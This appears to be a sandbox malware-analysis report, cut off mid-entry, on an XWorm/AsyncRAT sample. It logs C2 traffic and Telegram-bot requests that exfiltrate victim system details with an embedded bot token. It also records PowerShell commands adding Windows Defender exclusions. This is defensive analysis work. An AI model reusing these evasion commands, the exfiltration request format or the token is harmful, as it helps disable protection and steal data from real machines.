                                                                                                              Dec 6, 2024 22:46:03.618989944 CET4985312886192.168.2.9147.185.221.22
                                                                                                              Dec 6, 2024 22:46:03.738856077 CET1288649853147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:46:07.144324064 CET8049718208.95.112.1192.168.2.9
                                                                                                              Dec 6, 2024 22:46:07.144498110 CET4971880192.168.2.9208.95.112.1
                                                                                                              Dec 6, 2024 22:46:11.619716883 CET8049717208.95.112.1192.168.2.9
                                                                                                              Dec 6, 2024 22:46:11.619786978 CET4971780192.168.2.9208.95.112.1
                                                                                                              Dec 6, 2024 22:46:18.119385004 CET4985312886192.168.2.9147.185.221.22
                                                                                                              Dec 6, 2024 22:46:18.240633965 CET1288649853147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:46:18.826308012 CET1288649853147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:46:18.858988047 CET4985312886192.168.2.9147.185.221.22
                                                                                                              Dec 6, 2024 22:46:18.979015112 CET1288649853147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:46:19.602049112 CET1288649853147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:46:19.650417089 CET4985312886192.168.2.9147.185.221.22
                                                                                                              Dec 6, 2024 22:46:29.385777950 CET4985312886192.168.2.9147.185.221.22
                                                                                                              Dec 6, 2024 22:46:29.506232977 CET1288649853147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:46:30.092228889 CET1288649853147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:46:30.094219923 CET4985312886192.168.2.9147.185.221.22
                                                                                                              Dec 6, 2024 22:46:30.214184046 CET1288649853147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:46:40.666428089 CET4985312886192.168.2.9147.185.221.22
                                                                                                              Dec 6, 2024 22:46:40.786209106 CET1288649853147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:46:41.372776985 CET1288649853147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:46:41.375960112 CET4985312886192.168.2.9147.185.221.22
                                                                                                              Dec 6, 2024 22:46:41.495676041 CET1288649853147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:46:42.979626894 CET4971880192.168.2.9208.95.112.1
                                                                                                              Dec 6, 2024 22:46:43.026416063 CET4971780192.168.2.9208.95.112.1
                                                                                                              Dec 6, 2024 22:46:43.099318981 CET8049718208.95.112.1192.168.2.9
                                                                                                              Dec 6, 2024 22:46:43.146116018 CET8049717208.95.112.1192.168.2.9
                                                                                                              Dec 6, 2024 22:46:49.443300962 CET49958443192.168.2.9149.154.167.220
                                                                                                              Dec 6, 2024 22:46:49.443366051 CET44349958149.154.167.220192.168.2.9
                                                                                                              Dec 6, 2024 22:46:49.443489075 CET49958443192.168.2.9149.154.167.220
                                                                                                              Dec 6, 2024 22:46:49.449378967 CET49958443192.168.2.9149.154.167.220
                                                                                                              Dec 6, 2024 22:46:49.449404001 CET44349958149.154.167.220192.168.2.9
                                                                                                              Dec 6, 2024 22:46:49.604166031 CET1288649853147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:46:49.650557041 CET4985312886192.168.2.9147.185.221.22
                                                                                                              Dec 6, 2024 22:46:50.810718060 CET44349958149.154.167.220192.168.2.9
                                                                                                              Dec 6, 2024 22:46:50.810808897 CET49958443192.168.2.9149.154.167.220
                                                                                                              Dec 6, 2024 22:46:50.813003063 CET49958443192.168.2.9149.154.167.220
                                                                                                              Dec 6, 2024 22:46:50.813009977 CET44349958149.154.167.220192.168.2.9
                                                                                                              Dec 6, 2024 22:46:50.813267946 CET44349958149.154.167.220192.168.2.9
                                                                                                              Dec 6, 2024 22:46:50.853677988 CET49958443192.168.2.9149.154.167.220
                                                                                                              Dec 6, 2024 22:46:50.861675978 CET49958443192.168.2.9149.154.167.220
                                                                                                              Dec 6, 2024 22:46:50.907340050 CET44349958149.154.167.220192.168.2.9
                                                                                                              Dec 6, 2024 22:46:51.511787891 CET44349958149.154.167.220192.168.2.9
                                                                                                              Dec 6, 2024 22:46:51.511853933 CET44349958149.154.167.220192.168.2.9
                                                                                                              Dec 6, 2024 22:46:51.511991978 CET49958443192.168.2.9149.154.167.220
                                                                                                              Dec 6, 2024 22:46:51.514925003 CET49958443192.168.2.9149.154.167.220
                                                                                                              Dec 6, 2024 22:46:51.948564053 CET4985312886192.168.2.9147.185.221.22
                                                                                                              Dec 6, 2024 22:46:52.068526030 CET1288649853147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:46:52.653608084 CET1288649853147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:46:52.655477047 CET4985312886192.168.2.9147.185.221.22
                                                                                                              Dec 6, 2024 22:46:52.776290894 CET1288649853147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:46:57.882378101 CET4997712886192.168.2.9147.185.221.22
                                                                                                              Dec 6, 2024 22:46:58.002496004 CET1288649977147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:46:58.006238937 CET4997712886192.168.2.9147.185.221.22
                                                                                                              Dec 6, 2024 22:46:58.034151077 CET4997712886192.168.2.9147.185.221.22
                                                                                                              Dec 6, 2024 22:46:58.154015064 CET1288649977147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:47:00.402187109 CET4985312886192.168.2.9147.185.221.22
                                                                                                              Dec 6, 2024 22:47:00.521851063 CET1288649853147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:47:01.107347965 CET1288649853147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:47:01.117065907 CET4985312886192.168.2.9147.185.221.22
                                                                                                              Dec 6, 2024 22:47:01.236979008 CET1288649853147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:47:01.981009007 CET4985312886192.168.2.9147.185.221.22
                                                                                                              Dec 6, 2024 22:47:02.100941896 CET1288649853147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:47:02.686350107 CET1288649853147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:47:02.838205099 CET4985312886192.168.2.9147.185.221.22
                                                                                                              Dec 6, 2024 22:47:13.200721025 CET4997712886192.168.2.9147.185.221.22
                                                                                                              Dec 6, 2024 22:47:13.320517063 CET1288649977147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:47:13.928949118 CET1288649977147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:47:13.968838930 CET4997712886192.168.2.9147.185.221.22
                                                                                                              Dec 6, 2024 22:47:14.088802099 CET1288649977147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:47:15.277940989 CET4985312886192.168.2.9147.185.221.22
                                                                                                              Dec 6, 2024 22:47:15.397816896 CET1288649853147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:47:15.397865057 CET4985312886192.168.2.9147.185.221.22
                                                                                                              Dec 6, 2024 22:47:15.519037008 CET1288649853147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:47:16.427395105 CET1288649853147.185.221.22192.168.2.9
                                                                                                              Dec 6, 2024 22:47:16.553340912 CET4985312886192.168.2.9147.185.221.22
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 6, 2024 22:45:01.565632105 CET5594553192.168.2.91.1.1.1
                                                                                                              Dec 6, 2024 22:45:01.707586050 CET53559451.1.1.1192.168.2.9
                                                                                                              Dec 6, 2024 22:45:50.886702061 CET5491253192.168.2.91.1.1.1
                                                                                                              Dec 6, 2024 22:45:51.024120092 CET53549121.1.1.1192.168.2.9
                                                                                                              Dec 6, 2024 22:46:57.324816942 CET5362153192.168.2.91.1.1.1
                                                                                                              Dec 6, 2024 22:46:57.880480051 CET53536211.1.1.1192.168.2.9
                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Dec 6, 2024 22:45:01.565632105 CET192.168.2.91.1.1.10x36c6Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                              Dec 6, 2024 22:45:50.886702061 CET192.168.2.91.1.1.10xc3aStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                              Dec 6, 2024 22:46:57.324816942 CET192.168.2.91.1.1.10xafb4Standard query (0)carolina-comes.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Dec 6, 2024 22:44:56.014552116 CET1.1.1.1192.168.2.90x1d89No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Dec 6, 2024 22:44:56.014552116 CET1.1.1.1192.168.2.90x1d89No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                              Dec 6, 2024 22:45:01.707586050 CET1.1.1.1192.168.2.90x36c6No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                              Dec 6, 2024 22:45:51.024120092 CET1.1.1.1192.168.2.90xc3aNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                              Dec 6, 2024 22:46:57.880480051 CET1.1.1.1192.168.2.90xafb4No error (0)carolina-comes.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                                                                              • api.telegram.org
                                                                                                              • ip-api.com
                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.949717208.95.112.1807756C:\Users\user\wasdwasfwasfs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 6, 2024 22:45:01.881999969 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                              Host: ip-api.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 6, 2024 22:45:03.016623020 CET175INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 06 Dec 2024 21:45:02 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Content-Length: 6
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              X-Ttl: 60
                                                                                                              X-Rl: 44
                                                                                                              Data Raw: 66 61 6c 73 65 0a
                                                                                                              Data Ascii: false


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.949718208.95.112.1807732C:\Users\user\adawsfaefasfasfg.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 6, 2024 22:45:01.883156061 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                              Host: ip-api.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 6, 2024 22:45:02.967194080 CET175INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 06 Dec 2024 21:45:02 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Content-Length: 6
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              X-Ttl: 60
                                                                                                              X-Rl: 44
                                                                                                              Data Raw: 66 61 6c 73 65 0a
                                                                                                              Data Ascii: false


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.949825149.154.167.2204437756C:\Users\user\wasdwasfwasfs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-06 21:45:52 UTC444OUTGET /bot7517837255:AAFFYwsM3RAJTfnCWwagMLHeBQRG-F4UScg/sendMessage?chat_id=7538845070&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE3C0EEEB514F72781BA2%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20ELOET%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1
                                                                                                              Host: api.telegram.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-06 21:45:53 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 06 Dec 2024 21:45:52 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 461
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2024-12-06 21:45:53 UTC461INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 35 38 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 31 37 38 33 37 32 35 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 69 6e 64 69 61 6e 77 6f 72 6b 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 69 6e 64 69 61 6e 77 6f 72 6b 65 72 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 35 33 38 38 34 35 30 37 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4a 4f 48 4e 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 54 61 74 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4a 6f 68 6e 6e 79 74 61 74 65 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 35 32 31
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":5828,"from":{"id":7517837255,"is_bot":true,"first_name":"indianworke","username":"indianworker_bot"},"chat":{"id":7538845070,"first_name":"JOHN","last_name":"Tate","username":"Johnnytate1","type":"private"},"date":1733521


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.949958149.154.167.2204437732C:\Users\user\adawsfaefasfasfg.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-06 21:46:50 UTC444OUTGET /bot7517837255:AAFFYwsM3RAJTfnCWwagMLHeBQRG-F4UScg/sendMessage?chat_id=7538845070&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE3C0EEEB514F72781BA2%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20ELOET%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1
                                                                                                              Host: api.telegram.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-06 21:46:51 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 06 Dec 2024 21:46:51 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 461
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2024-12-06 21:46:51 UTC461INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 35 38 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 31 37 38 33 37 32 35 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 69 6e 64 69 61 6e 77 6f 72 6b 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 69 6e 64 69 61 6e 77 6f 72 6b 65 72 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 35 33 38 38 34 35 30 37 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4a 4f 48 4e 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 54 61 74 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4a 6f 68 6e 6e 79 74 61 74 65 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 35 32 31
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":5834,"from":{"id":7517837255,"is_bot":true,"first_name":"indianworke","username":"indianworker_bot"},"chat":{"id":7538845070,"first_name":"JOHN","last_name":"Tate","username":"Johnnytate1","type":"private"},"date":1733521


                                                                                                              Click to jump to process

                                                                                                              Click to jump to process

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Click to jump to process

                                                                                                              Target ID:0
                                                                                                              Start time:16:44:55
                                                                                                              Start date:06/12/2024
                                                                                                              Path:C:\Users\user\Desktop\ozgpPwVAu1.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Users\user\Desktop\ozgpPwVAu1.exe"
                                                                                                              Imagebase:0xa90000
                                                                                                              File size:193'024 bytes
                                                                                                              MD5 hash:784BD7F714CF13880F47C591E7AED7FA
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:2
                                                                                                              Start time:16:44:56
                                                                                                              Start date:06/12/2024
                                                                                                              Path:C:\Users\user\adawsfaefasfasfg.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Users\user\adawsfaefasfasfg.exe"
                                                                                                              Imagebase:0xeb0000
                                                                                                              File size:43'520 bytes
                                                                                                              MD5 hash:190010C187189B92E49A0ED05F6DDC88
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp, Author: ditekSHen
                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.2592447973.0000000003081000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\adawsfaefasfasfg.exe, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\adawsfaefasfasfg.exe, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\adawsfaefasfasfg.exe, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\adawsfaefasfasfg.exe, Author: Joe Security
                                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\adawsfaefasfasfg.exe, Author: ditekSHen
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              Reputation:low
                                                                                                              Has exited:false

                                                                                                              Target ID:3
                                                                                                              Start time:16:44:56
                                                                                                              Start date:06/12/2024
                                                                                                              Path:C:\Users\user\wasdwasfwasfs.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Users\user\wasdwasfwasfs.exe"
                                                                                                              Imagebase:0xc80000
                                                                                                              File size:41'472 bytes
                                                                                                              MD5 hash:34452F83F7D58EC91D2CEDF4B24C9764
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.2591449977.0000000002F05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.2591449977.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                                                                              • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\wasdwasfwasfs.exe, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\wasdwasfwasfs.exe, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\wasdwasfwasfs.exe, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\wasdwasfwasfs.exe, Author: Joe Security
                                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\wasdwasfwasfs.exe, Author: ditekSHen
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              Reputation:low
                                                                                                              Has exited:false

                                                                                                              Target ID:4
                                                                                                              Start time:16:44:56
                                                                                                              Start date:06/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\PIN CRACKER V2.bat" "
                                                                                                              Imagebase:0x7ff779360000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:5
                                                                                                              Start time:16:44:56
                                                                                                              Start date:06/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff70f010000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:6
                                                                                                              Start time:16:44:57
                                                                                                              Start date:06/12/2024
                                                                                                              Path:C:\Windows\System32\chcp.com
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:chcp 65001
                                                                                                              Imagebase:0x7ff74d9b0000
                                                                                                              File size:14'848 bytes
                                                                                                              MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:7
                                                                                                              Start time:16:44:57
                                                                                                              Start date:06/12/2024
                                                                                                              Path:C:\Windows\System32\where.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:where curl
                                                                                                              Imagebase:0x7ff687740000
                                                                                                              File size:43'008 bytes
                                                                                                              MD5 hash:3CF958B0F63FB1D74F7FCFE14B039A58
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate
                                                                                                              Has exited:true

                                                                                                              Target ID:8
                                                                                                              Start time:16:45:01
                                                                                                              Start date:06/12/2024
                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe'
                                                                                                              Imagebase:0x7ff760310000
                                                                                                              File size:452'608 bytes
                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:9
                                                                                                              Start time:16:45:01
                                                                                                              Start date:06/12/2024
                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\wasdwasfwasfs.exe'
                                                                                                              Imagebase:0x7ff760310000
                                                                                                              File size:452'608 bytes
                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:10
                                                                                                              Start time:16:45:01
                                                                                                              Start date:06/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff70f010000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:11
                                                                                                              Start time:16:45:01
                                                                                                              Start date:06/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff70f010000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:14
                                                                                                              Start time:16:45:15
                                                                                                              Start date:06/12/2024
                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wasdwasfwasfs.exe'
                                                                                                              Imagebase:0x7ff760310000
                                                                                                              File size:452'608 bytes
                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:15
                                                                                                              Start time:16:45:15
                                                                                                              Start date:06/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff70f010000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:16
                                                                                                              Start time:16:45:15
                                                                                                              Start date:06/12/2024
                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):false
